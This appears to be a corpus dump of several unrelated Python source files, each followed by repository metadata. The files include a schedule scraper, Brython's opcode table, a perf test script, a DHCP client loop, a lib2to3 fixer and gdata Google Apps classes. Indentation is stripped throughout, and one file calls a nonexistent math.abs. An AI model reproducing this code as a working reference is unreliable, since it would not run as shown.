return []
#return ['.png','.jpg','.gif','.jpeg','.bmp','.tiff']
def _doIndexContent(self, content):
return 'image'
cntIndex.register(ImageNoIndex())
# other opendocument formats:
# chart-template chart database
# formula-template formula graphics-template graphics
# image
# presentation-template presentation spreadsheet-template spreadsheet
class OpenDoc(indexer):
""" Index OpenDocument files.
Q: is it really worth it to index spreadsheets, or do we only get a
meaningless list of numbers (cell contents) ?
"""
def _getMimeTypes(self):
otypes = [ 'text', 'text-web', 'text-template', 'text-master' ]
return map(lambda a: 'application/vnd.oasis.opendocument.'+a, otypes)
def _getExtensions(self):
return ['.odt', '.ott', ] # '.ods'
def _doIndexContent(self, content):
s = StringIO.StringIO(content)
o = odt2txt.OpenDocumentTextFile(s)
result = _to_unicode(o.toString())
s.close()
return result
cntIndex.register(OpenDoc())
#eof
|
agpl-3.0
|
Ferluci/MAI-Schedule
|
parser.py
|
1
|
1373
|
from requests import get
from bs4 import BeautifulSoup
def _group_parser(target_url):
request = get(target_url)
soup = BeautifulSoup(request.text, "html.parser")
groups = []
for group in soup.find_all('a', class_="sc-group-item"):
group = group.get_text()
groups.append(group)
return groups
def parse_groups():
target_url = 'https://www.mai.ru/education/schedule'
return _group_parser(target_url)
def parse_examining_groups():
target_url = 'https://www.mai.ru/education/schedule/session'
return _group_parser(target_url)
def _schedule_parser(target_url):
request = get(target_url)
soup = BeautifulSoup(request.text, "html.parser")
result = []
for day in soup.find_all('div', class_="sc-container"):
day = day.get_text().split('\n')
day = [x for x in day if x != '']
result.append(day)
return result
def parse_academic_schedule(group_name, week_number):
target_url = "http://www.mai.ru/" + \
"education/schedule/detail.php?group=" + \
group_name + '&week=' + str(week_number)
return _schedule_parser(target_url)
def parse_session_schedule(group_name):
target_url = "https://www.mai.ru/" + \
"education/schedule/session.php?group=" + \
group_name
return _schedule_parser(target_url)
|
mit
|
40223148/2015cda_g5
|
static/Brython3.1.1-20150328-091302/Lib/opcode.py
|
714
|
5442
|
"""
opcode module - potentially shared between dis and other modules which
operate on bytecodes (e.g. peephole optimizers).
"""
__all__ = ["cmp_op", "hasconst", "hasname", "hasjrel", "hasjabs",
"haslocal", "hascompare", "hasfree", "opname", "opmap",
"HAVE_ARGUMENT", "EXTENDED_ARG", "hasnargs"]
# It's a chicken-and-egg I'm afraid:
# We're imported before _opcode's made.
# With exception unheeded
# (stack_effect is not needed)
# Both our chickens and eggs are allayed.
# --Larry Hastings, 2013/11/23
try:
from _opcode import stack_effect
__all__.append('stack_effect')
except ImportError:
pass
cmp_op = ('<', '<=', '==', '!=', '>', '>=', 'in', 'not in', 'is',
'is not', 'exception match', 'BAD')
hasconst = []
hasname = []
hasjrel = []
hasjabs = []
haslocal = []
hascompare = []
hasfree = []
hasnargs = []
opmap = {}
opname = [''] * 256
for op in range(256): opname[op] = '<%r>' % (op,)
del op
def def_op(name, op):
opname[op] = name
opmap[name] = op
def name_op(name, op):
def_op(name, op)
hasname.append(op)
def jrel_op(name, op):
def_op(name, op)
hasjrel.append(op)
def jabs_op(name, op):
def_op(name, op)
hasjabs.append(op)
# Instruction opcodes for compiled code
# Blank lines correspond to available opcodes
def_op('POP_TOP', 1)
def_op('ROT_TWO', 2)
def_op('ROT_THREE', 3)
def_op('DUP_TOP', 4)
def_op('DUP_TOP_TWO', 5)
def_op('NOP', 9)
def_op('UNARY_POSITIVE', 10)
def_op('UNARY_NEGATIVE', 11)
def_op('UNARY_NOT', 12)
def_op('UNARY_INVERT', 15)
def_op('BINARY_POWER', 19)
def_op('BINARY_MULTIPLY', 20)
def_op('BINARY_MODULO', 22)
def_op('BINARY_ADD', 23)
def_op('BINARY_SUBTRACT', 24)
def_op('BINARY_SUBSCR', 25)
def_op('BINARY_FLOOR_DIVIDE', 26)
def_op('BINARY_TRUE_DIVIDE', 27)
def_op('INPLACE_FLOOR_DIVIDE', 28)
def_op('INPLACE_TRUE_DIVIDE', 29)
def_op('STORE_MAP', 54)
def_op('INPLACE_ADD', 55)
def_op('INPLACE_SUBTRACT', 56)
def_op('INPLACE_MULTIPLY', 57)
def_op('INPLACE_MODULO', 59)
def_op('STORE_SUBSCR', 60)
def_op('DELETE_SUBSCR', 61)
def_op('BINARY_LSHIFT', 62)
def_op('BINARY_RSHIFT', 63)
def_op('BINARY_AND', 64)
def_op('BINARY_XOR', 65)
def_op('BINARY_OR', 66)
def_op('INPLACE_POWER', 67)
def_op('GET_ITER', 68)
def_op('PRINT_EXPR', 70)
def_op('LOAD_BUILD_CLASS', 71)
def_op('YIELD_FROM', 72)
def_op('INPLACE_LSHIFT', 75)
def_op('INPLACE_RSHIFT', 76)
def_op('INPLACE_AND', 77)
def_op('INPLACE_XOR', 78)
def_op('INPLACE_OR', 79)
def_op('BREAK_LOOP', 80)
def_op('WITH_CLEANUP', 81)
def_op('RETURN_VALUE', 83)
def_op('IMPORT_STAR', 84)
def_op('YIELD_VALUE', 86)
def_op('POP_BLOCK', 87)
def_op('END_FINALLY', 88)
def_op('POP_EXCEPT', 89)
HAVE_ARGUMENT = 90 # Opcodes from here have an argument:
name_op('STORE_NAME', 90) # Index in name list
name_op('DELETE_NAME', 91) # ""
def_op('UNPACK_SEQUENCE', 92) # Number of tuple items
jrel_op('FOR_ITER', 93)
def_op('UNPACK_EX', 94)
name_op('STORE_ATTR', 95) # Index in name list
name_op('DELETE_ATTR', 96) # ""
name_op('STORE_GLOBAL', 97) # ""
name_op('DELETE_GLOBAL', 98) # ""
def_op('LOAD_CONST', 100) # Index in const list
hasconst.append(100)
name_op('LOAD_NAME', 101) # Index in name list
def_op('BUILD_TUPLE', 102) # Number of tuple items
def_op('BUILD_LIST', 103) # Number of list items
def_op('BUILD_SET', 104) # Number of set items
def_op('BUILD_MAP', 105) # Number of dict entries (upto 255)
name_op('LOAD_ATTR', 106) # Index in name list
def_op('COMPARE_OP', 107) # Comparison operator
hascompare.append(107)
name_op('IMPORT_NAME', 108) # Index in name list
name_op('IMPORT_FROM', 109) # Index in name list
jrel_op('JUMP_FORWARD', 110) # Number of bytes to skip
jabs_op('JUMP_IF_FALSE_OR_POP', 111) # Target byte offset from beginning of code
jabs_op('JUMP_IF_TRUE_OR_POP', 112) # ""
jabs_op('JUMP_ABSOLUTE', 113) # ""
jabs_op('POP_JUMP_IF_FALSE', 114) # ""
jabs_op('POP_JUMP_IF_TRUE', 115) # ""
name_op('LOAD_GLOBAL', 116) # Index in name list
jabs_op('CONTINUE_LOOP', 119) # Target address
jrel_op('SETUP_LOOP', 120) # Distance to target address
jrel_op('SETUP_EXCEPT', 121) # ""
jrel_op('SETUP_FINALLY', 122) # ""
def_op('LOAD_FAST', 124) # Local variable number
haslocal.append(124)
def_op('STORE_FAST', 125) # Local variable number
haslocal.append(125)
def_op('DELETE_FAST', 126) # Local variable number
haslocal.append(126)
def_op('RAISE_VARARGS', 130) # Number of raise arguments (1, 2, or 3)
def_op('CALL_FUNCTION', 131) # #args + (#kwargs << 8)
hasnargs.append(131)
def_op('MAKE_FUNCTION', 132) # Number of args with default values
def_op('BUILD_SLICE', 133) # Number of items
def_op('MAKE_CLOSURE', 134)
def_op('LOAD_CLOSURE', 135)
hasfree.append(135)
def_op('LOAD_DEREF', 136)
hasfree.append(136)
def_op('STORE_DEREF', 137)
hasfree.append(137)
def_op('DELETE_DEREF', 138)
hasfree.append(138)
def_op('CALL_FUNCTION_VAR', 140) # #args + (#kwargs << 8)
hasnargs.append(140)
def_op('CALL_FUNCTION_KW', 141) # #args + (#kwargs << 8)
hasnargs.append(141)
def_op('CALL_FUNCTION_VAR_KW', 142) # #args + (#kwargs << 8)
hasnargs.append(142)
jrel_op('SETUP_WITH', 143)
def_op('LIST_APPEND', 145)
def_op('SET_ADD', 146)
def_op('MAP_ADD', 147)
def_op('LOAD_CLASSDEREF', 148)
hasfree.append(148)
def_op('EXTENDED_ARG', 144)
EXTENDED_ARG = 144
del def_op, name_op, jrel_op, jabs_op
|
gpl-3.0
|
TheNotOnly/linux-3.5
|
tools/perf/scripts/python/check-perf-trace.py
|
11214
|
2503
|
# perf script event handlers, generated by perf script -g python
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# This script tests basic functionality such as flag and symbol
# strings, common_xxx() calls back into perf, begin, end, unhandled
# events, etc. Basically, if this script runs successfully and
# displays expected results, Python scripting support should be ok.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Core import *
from perf_trace_context import *
unhandled = autodict()
def trace_begin():
print "trace_begin"
pass
def trace_end():
print_unhandled()
def irq__softirq_entry(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
vec):
print_header(event_name, common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
print_uncommon(context)
print "vec=%s\n" % \
(symbol_str("irq__softirq_entry", "vec", vec)),
def kmem__kmalloc(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
call_site, ptr, bytes_req, bytes_alloc,
gfp_flags):
print_header(event_name, common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
print_uncommon(context)
print "call_site=%u, ptr=%u, bytes_req=%u, " \
"bytes_alloc=%u, gfp_flags=%s\n" % \
(call_site, ptr, bytes_req, bytes_alloc,
flag_str("kmem__kmalloc", "gfp_flags", gfp_flags)),
def trace_unhandled(event_name, context, event_fields_dict):
try:
unhandled[event_name] += 1
except TypeError:
unhandled[event_name] = 1
def print_header(event_name, cpu, secs, nsecs, pid, comm):
print "%-20s %5u %05u.%09u %8u %-20s " % \
(event_name, cpu, secs, nsecs, pid, comm),
# print trace fields not included in handler args
def print_uncommon(context):
print "common_preempt_count=%d, common_flags=%s, common_lock_depth=%d, " \
% (common_pc(context), trace_flag_str(common_flags(context)), \
common_lock_depth(context))
def print_unhandled():
keys = unhandled.keys()
if not keys:
return
print "\nunhandled events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"-----------"),
for event_name in keys:
print "%-40s %10d\n" % (event_name, unhandled[event_name])
|
gpl-2.0
|
frankurcrazy/pydhcpd
|
dhcp_client.py
|
1
|
2797
|
#!/usr/bin/env python
import dhcp_packet
import socket
import random
import time
import Queue
import select
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.bind( ("", 68) )
sock.settimeout(5)
mac = "".join(random.choice("abcdef0123456789") for _ in xrange(0,12))
dest = ("<broadcast>", 67)
bufsize = 8192
while True:
xid = random.randrange(2**32)
t1 = 0
# send dhcp_discover
print "sending dhcp discover"
dhcp_discover = dhcp_packet.dhcp_packet(message_type=dhcp_packet.DHCPDISCOVER,mac=mac,xid=xid,broadcast=True)
print dhcp_discover
sock.sendto(dhcp_discover.to_raw(),dest)
# receive dhcp offer
try:
response = sock.recv(bufsize)
except socket.timeout:
print "timeout"
continue
response = dhcp_packet.from_raw_message(response)
print response
if response.xid == xid and response.message_type == dhcp_packet.DHCPOFFER:
print "received correspondent dhcp offer"
print response
offer_ip = response.yiaddr
server_identifier = [ value for (code, value) in response.options if code == dhcp_packet.__OPTION_SERVER_IDENTIFIER__ ]
server_identifier = server_identifier[0] if server_identifier else None
lease_time = [ value for (code, value) in response.options if code == dhcp_packet.__OPTION_LEASE_TIME__ ]
t1_time = [ value for (code, value) in response.options if code == dhcp_packet.__OPTION_RENEW_TIME__ ]
t1 = t1_time[0] if t1_time else lease_time[0]/2 if lease_time else 0
# send dhcp request
print "sending dhcp request"
options = [
(dhcp_packet.__OPTION_SERVER_IDENTIFIER__, server_identifier),
(dhcp_packet.__OPTION_REQUESTED_ADDRESS__, offer_ip)
]
dhcp_request = dhcp_packet.dhcp_packet(message_type=dhcp_packet.DHCPREQUEST, mac=mac, xid=xid, broadcast=True, options=options)
print dhcp_request
sock.sendto(dhcp_request.to_raw(),dest)
# recv dhcp ack
try:
response = sock.recv(bufsize)
except socket.timeout:
print "timeout"
continue
response = dhcp_packet.from_raw_message(response)
if response.xid == xid and response.message_type == dhcp_packet.DHCPACK:
print response
while True:
if t1 ==0: continue
# send renew
time.sleep(t1)
print "lease time/2 or t1 reached, send renew (%(timestamp)s)" % { 'timestamp': time.ctime()}
dhcp_request = dhcp_packet.dhcp_packet(message_type=dhcp_packet.DHCPREQUEST, mac=mac, xid=xid, broadcast=True, options=options)
print dhcp_request
sock.sendto(dhcp_request.to_raw(),dest)
# recv ack
try:
response = sock.recv(bufsize)
except socket.timeout:
print "timeout"
continue
response = dhcp_packet.from_raw_message(response)
if response.xid == xid and response.message_type == dhcp_packet.DHCPACK:
print response
|
bsd-2-clause
|
akhileshmaurya/Starting-With-Python
|
DistanceUtils.py
|
1
|
1659
|
import math
import json
def manhatanDistance(x1, y1, x2, y2):
distance = math.abs(x1 - x2) + math.abs(y1 - y2)
return distance
def euclidianDistance(x1, y1, x2, y2):
distance = math.sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)
return distance
data = []
with open('data.txt') as json_data:
data = json.load(json_data)
#print(data)
for key in data:
print key
print data[key]
'''Lets assume we have some Some rating based on user we have to
read this and parse the json --
{"Angelica": {"Blues Traveler": 3.5, "Broken Bells": 2.0,
"Norah Jones": 4.5, "Phoenix": 5.0,
"Slightly Stoopid": 1.5,
"The Strokes": 2.5, "Vampire Weekend": 2.0},
{"Blues Traveler": 2.0, "Broken Bells": 3.5,
"Deadmau5": 4.0, "Phoenix": 2.0,
"Slightly Stoopid": 3.5, "Vampire Weekend": 3.0},
{"Blues Traveler": 5.0, "Broken Bells": 1.0,
"Deadmau5": 1.0, "Norah Jones": 3.0,
"Phoenix": 5, "Slightly Stoopid": 1.0},
{"Blues Traveler": 3.0, "Broken Bells": 4.0,
"Deadmau5": 4.5, "Phoenix": 3.0,
"Slightly Stoopid": 4.5, "The Strokes": 4.0,
"Vampire Weekend": 2.0},
{"Broken Bells": 4.0, "Deadmau5": 1.0,
"Norah Jones": 4.0, "The Strokes": 4.0,
"Vampire Weekend": 1.0},
{"Broken Bells": 4.5, "Deadmau5": 4.0, "Norah Jones": 5.0,
"Phoenix": 5.0, "Slightly Stoopid": 4.5,
"The Strokes": 4.0, "Vampire Weekend": 4.0},
{"Blues Traveler": 5.0, "Broken Bells": 2.0,
"Norah Jones": 3.0, "Phoenix": 5.0,
"Slightly Stoopid": 4.0, "The Strokes": 5.0},
"Veronica": {"Blues Traveler": 3.0, "Norah Jones": 5.0,
"Phoenix": 4.0, "Slightly Stoopid": 2.5,
"The Strokes": 3.0}}'''
|
gpl-3.0
|
MichaelNedzelsky/intellij-community
|
python/helpers/pydev/third_party/pep8/lib2to3/lib2to3/fixes/fix_renames.py
|
326
|
2218
|
"""Fix incompatible renames
Fixes:
* sys.maxint -> sys.maxsize
"""
# Author: Christian Heimes
# based on Collin Winter's fix_import
# Local imports
from .. import fixer_base
from ..fixer_util import Name, attr_chain
MAPPING = {"sys": {"maxint" : "maxsize"},
}
LOOKUP = {}
def alternates(members):
return "(" + "|".join(map(repr, members)) + ")"
def build_pattern():
#bare = set()
for module, replace in MAPPING.items():
for old_attr, new_attr in replace.items():
LOOKUP[(module, old_attr)] = new_attr
#bare.add(module)
#bare.add(old_attr)
#yield """
# import_name< 'import' (module=%r
# | dotted_as_names< any* module=%r any* >) >
# """ % (module, module)
yield """
import_from< 'from' module_name=%r 'import'
( attr_name=%r | import_as_name< attr_name=%r 'as' any >) >
""" % (module, old_attr, old_attr)
yield """
power< module_name=%r trailer< '.' attr_name=%r > any* >
""" % (module, old_attr)
#yield """bare_name=%s""" % alternates(bare)
class FixRenames(fixer_base.BaseFix):
BM_compatible = True
PATTERN = "|".join(build_pattern())
order = "pre" # Pre-order tree traversal
# Don't match the node if it's within another match
def match(self, node):
match = super(FixRenames, self).match
results = match(node)
if results:
if any(match(obj) for obj in attr_chain(node, "parent")):
return False
return results
return False
#def start_tree(self, tree, filename):
# super(FixRenames, self).start_tree(tree, filename)
# self.replace = {}
def transform(self, node, results):
mod_name = results.get("module_name")
attr_name = results.get("attr_name")
#bare_name = results.get("bare_name")
#import_mod = results.get("module")
if mod_name and attr_name:
new_attr = unicode(LOOKUP[(mod_name.value, attr_name.value)])
attr_name.replace(Name(new_attr, prefix=attr_name.prefix))
|
apache-2.0
|
pyjs/pyjs
|
examples/tabpanelwidget/__main__.py
|
8
|
1051
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
TARGETS = [
'Tabs.py',
]
PACKAGE = {
'title': 'tabpanelwidget',
'desc': 'Tab Panel example',
}
def setup(targets):
'''Setup example for translation, MUST call util.setup(targets).'''
util.setup(targets)
def translate():
'''Translate example, MUST call util.translate().'''
util.translate()
def install(package):
'''Install and cleanup example module. MUST call util.install(package)'''
util.install(package)
##---------------------------------------##
# --------- (-: DO NOT EDIT :-) --------- #
##---------------------------------------##
import sys
import os
examples = head = os.path.abspath(os.path.dirname(__file__))
while os.path.split(examples)[1].lower() != 'examples':
examples = os.path.split(examples)[0]
if not examples:
raise ValueError("Cannot determine examples directory")
sys.path.insert(0, os.path.join(examples))
from _examples import util
sys.path.pop(0)
util.init(head)
setup(TARGETS)
translate()
install(PACKAGE)
|
apache-2.0
|
Immortalin/python-for-android
|
python3-alpha/extra_modules/gdata/apps/__init__.py
|
285
|
21144
|
#!/usr/bin/python
#
# Copyright (C) 2007 SIOS Technology, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains objects used with Google Apps."""
__author__ = '[email protected] (Takashi MATSUO)'
import atom
import gdata
# XML namespaces which are often used in Google Apps entity.
APPS_NAMESPACE = 'http://schemas.google.com/apps/2006'
APPS_TEMPLATE = '{http://schemas.google.com/apps/2006}%s'
class EmailList(atom.AtomBase):
"""The Google Apps EmailList element"""
_tag = 'emailList'
_namespace = APPS_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
_attributes['name'] = 'name'
def __init__(self, name=None, extension_elements=None,
extension_attributes=None, text=None):
self.name = name
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def EmailListFromString(xml_string):
return atom.CreateClassFromXMLString(EmailList, xml_string)
class Who(atom.AtomBase):
"""The Google Apps Who element"""
_tag = 'who'
_namespace = gdata.GDATA_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
_attributes['rel'] = 'rel'
_attributes['email'] = 'email'
def __init__(self, rel=None, email=None, extension_elements=None,
extension_attributes=None, text=None):
self.rel = rel
self.email = email
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def WhoFromString(xml_string):
return atom.CreateClassFromXMLString(Who, xml_string)
class Login(atom.AtomBase):
"""The Google Apps Login element"""
_tag = 'login'
_namespace = APPS_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
_attributes['userName'] = 'user_name'
_attributes['password'] = 'password'
_attributes['suspended'] = 'suspended'
_attributes['admin'] = 'admin'
_attributes['changePasswordAtNextLogin'] = 'change_password'
_attributes['agreedToTerms'] = 'agreed_to_terms'
_attributes['ipWhitelisted'] = 'ip_whitelisted'
_attributes['hashFunctionName'] = 'hash_function_name'
def __init__(self, user_name=None, password=None, suspended=None,
ip_whitelisted=None, hash_function_name=None,
admin=None, change_password=None, agreed_to_terms=None,
extension_elements=None, extension_attributes=None,
text=None):
self.user_name = user_name
self.password = password
self.suspended = suspended
self.admin = admin
self.change_password = change_password
self.agreed_to_terms = agreed_to_terms
self.ip_whitelisted = ip_whitelisted
self.hash_function_name = hash_function_name
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def LoginFromString(xml_string):
return atom.CreateClassFromXMLString(Login, xml_string)
class Quota(atom.AtomBase):
"""The Google Apps Quota element"""
_tag = 'quota'
_namespace = APPS_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
_attributes['limit'] = 'limit'
def __init__(self, limit=None, extension_elements=None,
extension_attributes=None, text=None):
self.limit = limit
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def QuotaFromString(xml_string):
return atom.CreateClassFromXMLString(Quota, xml_string)
class Name(atom.AtomBase):
"""The Google Apps Name element"""
_tag = 'name'
_namespace = APPS_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
_attributes['familyName'] = 'family_name'
_attributes['givenName'] = 'given_name'
def __init__(self, family_name=None, given_name=None,
extension_elements=None, extension_attributes=None, text=None):
self.family_name = family_name
self.given_name = given_name
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def NameFromString(xml_string):
return atom.CreateClassFromXMLString(Name, xml_string)
class Nickname(atom.AtomBase):
"""The Google Apps Nickname element"""
_tag = 'nickname'
_namespace = APPS_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
_attributes['name'] = 'name'
def __init__(self, name=None,
extension_elements=None, extension_attributes=None, text=None):
self.name = name
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def NicknameFromString(xml_string):
return atom.CreateClassFromXMLString(Nickname, xml_string)
class NicknameEntry(gdata.GDataEntry):
"""A Google Apps flavor of an Atom Entry for Nickname"""
_tag = 'entry'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataEntry._children.copy()
_attributes = gdata.GDataEntry._attributes.copy()
_children['{%s}login' % APPS_NAMESPACE] = ('login', Login)
_children['{%s}nickname' % APPS_NAMESPACE] = ('nickname', Nickname)
def __init__(self, author=None, category=None, content=None,
atom_id=None, link=None, published=None,
title=None, updated=None,
login=None, nickname=None,
extended_property=None,
extension_elements=None, extension_attributes=None, text=None):
gdata.GDataEntry.__init__(self, author=author, category=category,
content=content,
atom_id=atom_id, link=link, published=published,
title=title, updated=updated)
self.login = login
self.nickname = nickname
self.extended_property = extended_property or []
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def NicknameEntryFromString(xml_string):
return atom.CreateClassFromXMLString(NicknameEntry, xml_string)
class NicknameFeed(gdata.GDataFeed, gdata.LinkFinder):
"""A Google Apps Nickname feed flavor of an Atom Feed"""
_tag = 'feed'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataFeed._children.copy()
_attributes = gdata.GDataFeed._attributes.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [NicknameEntry])
def __init__(self, author=None, category=None, contributor=None,
generator=None, icon=None, atom_id=None, link=None, logo=None,
rights=None, subtitle=None, title=None, updated=None,
entry=None, total_results=None, start_index=None,
items_per_page=None, extension_elements=None,
extension_attributes=None, text=None):
gdata.GDataFeed.__init__(self, author=author, category=category,
contributor=contributor, generator=generator,
icon=icon, atom_id=atom_id, link=link,
logo=logo, rights=rights, subtitle=subtitle,
title=title, updated=updated, entry=entry,
total_results=total_results,
start_index=start_index,
items_per_page=items_per_page,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
def NicknameFeedFromString(xml_string):
return atom.CreateClassFromXMLString(NicknameFeed, xml_string)
class UserEntry(gdata.GDataEntry):
"""A Google Apps flavor of an Atom Entry"""
_tag = 'entry'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataEntry._children.copy()
_attributes = gdata.GDataEntry._attributes.copy()
_children['{%s}login' % APPS_NAMESPACE] = ('login', Login)
_children['{%s}name' % APPS_NAMESPACE] = ('name', Name)
_children['{%s}quota' % APPS_NAMESPACE] = ('quota', Quota)
# This child may already be defined in GDataEntry, confirm before removing.
_children['{%s}feedLink' % gdata.GDATA_NAMESPACE] = ('feed_link',
[gdata.FeedLink])
_children['{%s}who' % gdata.GDATA_NAMESPACE] = ('who', Who)
def __init__(self, author=None, category=None, content=None,
atom_id=None, link=None, published=None,
title=None, updated=None,
login=None, name=None, quota=None, who=None, feed_link=None,
extended_property=None,
extension_elements=None, extension_attributes=None, text=None):
gdata.GDataEntry.__init__(self, author=author, category=category,
content=content,
atom_id=atom_id, link=link, published=published,
title=title, updated=updated)
self.login = login
self.name = name
self.quota = quota
self.who = who
self.feed_link = feed_link or []
self.extended_property = extended_property or []
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def UserEntryFromString(xml_string):
return atom.CreateClassFromXMLString(UserEntry, xml_string)
class UserFeed(gdata.GDataFeed, gdata.LinkFinder):
"""A Google Apps User feed flavor of an Atom Feed"""
_tag = 'feed'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataFeed._children.copy()
_attributes = gdata.GDataFeed._attributes.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [UserEntry])
def __init__(self, author=None, category=None, contributor=None,
generator=None, icon=None, atom_id=None, link=None, logo=None,
rights=None, subtitle=None, title=None, updated=None,
entry=None, total_results=None, start_index=None,
items_per_page=None, extension_elements=None,
extension_attributes=None, text=None):
gdata.GDataFeed.__init__(self, author=author, category=category,
contributor=contributor, generator=generator,
icon=icon, atom_id=atom_id, link=link,
logo=logo, rights=rights, subtitle=subtitle,
title=title, updated=updated, entry=entry,
total_results=total_results,
start_index=start_index,
items_per_page=items_per_page,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
def UserFeedFromString(xml_string):
return atom.CreateClassFromXMLString(UserFeed, xml_string)
class EmailListEntry(gdata.GDataEntry):
"""A Google Apps EmailList flavor of an Atom Entry"""
_tag = 'entry'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataEntry._children.copy()
_attributes = gdata.GDataEntry._attributes.copy()
_children['{%s}emailList' % APPS_NAMESPACE] = ('email_list', EmailList)
# Might be able to remove this _children entry.
_children['{%s}feedLink' % gdata.GDATA_NAMESPACE] = ('feed_link',
[gdata.FeedLink])
def __init__(self, author=None, category=None, content=None,
atom_id=None, link=None, published=None,
title=None, updated=None,
email_list=None, feed_link=None,
extended_property=None,
extension_elements=None, extension_attributes=None, text=None):
gdata.GDataEntry.__init__(self, author=author, category=category,
content=content,
atom_id=atom_id, link=link, published=published,
title=title, updated=updated)
self.email_list = email_list
self.feed_link = feed_link or []
self.extended_property = extended_property or []
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def EmailListEntryFromString(xml_string):
return atom.CreateClassFromXMLString(EmailListEntry, xml_string)
class EmailListFeed(gdata.GDataFeed, gdata.LinkFinder):
"""A Google Apps EmailList feed flavor of an Atom Feed"""
_tag = 'feed'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataFeed._children.copy()
_attributes = gdata.GDataFeed._attributes.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [EmailListEntry])
def __init__(self, author=None, category=None, contributor=None,
generator=None, icon=None, atom_id=None, link=None, logo=None,
rights=None, subtitle=None, title=None, updated=None,
entry=None, total_results=None, start_index=None,
items_per_page=None, extension_elements=None,
extension_attributes=None, text=None):
gdata.GDataFeed.__init__(self, author=author, category=category,
contributor=contributor, generator=generator,
icon=icon, atom_id=atom_id, link=link,
logo=logo, rights=rights, subtitle=subtitle,
title=title, updated=updated, entry=entry,
total_results=total_results,
start_index=start_index,
items_per_page=items_per_page,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
def EmailListFeedFromString(xml_string):
return atom.CreateClassFromXMLString(EmailListFeed, xml_string)
class EmailListRecipientEntry(gdata.GDataEntry):
"""A Google Apps EmailListRecipient flavor of an Atom Entry"""
_tag = 'entry'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataEntry._children.copy()
_attributes = gdata.GDataEntry._attributes.copy()
_children['{%s}who' % gdata.GDATA_NAMESPACE] = ('who', Who)
def __init__(self, author=None, category=None, content=None,
atom_id=None, link=None, published=None,
title=None, updated=None,
who=None,
extended_property=None,
extension_elements=None, extension_attributes=None, text=None):
gdata.GDataEntry.__init__(self, author=author, category=category,
content=content,
atom_id=atom_id, link=link, published=published,
title=title, updated=updated)
self.who = who
self.extended_property = extended_property or []
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def EmailListRecipientEntryFromString(xml_string):
return atom.CreateClassFromXMLString(EmailListRecipientEntry, xml_string)
class EmailListRecipientFeed(gdata.GDataFeed, gdata.LinkFinder):
"""A Google Apps EmailListRecipient feed flavor of an Atom Feed"""
_tag = 'feed'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataFeed._children.copy()
_attributes = gdata.GDataFeed._attributes.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry',
[EmailListRecipientEntry])
def __init__(self, author=None, category=None, contributor=None,
generator=None, icon=None, atom_id=None, link=None, logo=None,
rights=None, subtitle=None, title=None, updated=None,
entry=None, total_results=None, start_index=None,
items_per_page=None, extension_elements=None,
extension_attributes=None, text=None):
gdata.GDataFeed.__init__(self, author=author, category=category,
contributor=contributor, generator=generator,
icon=icon, atom_id=atom_id, link=link,
logo=logo, rights=rights, subtitle=subtitle,
title=title, updated=updated, entry=entry,
total_results=total_results,
start_index=start_index,
items_per_page=items_per_page,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
def EmailListRecipientFeedFromString(xml_string):
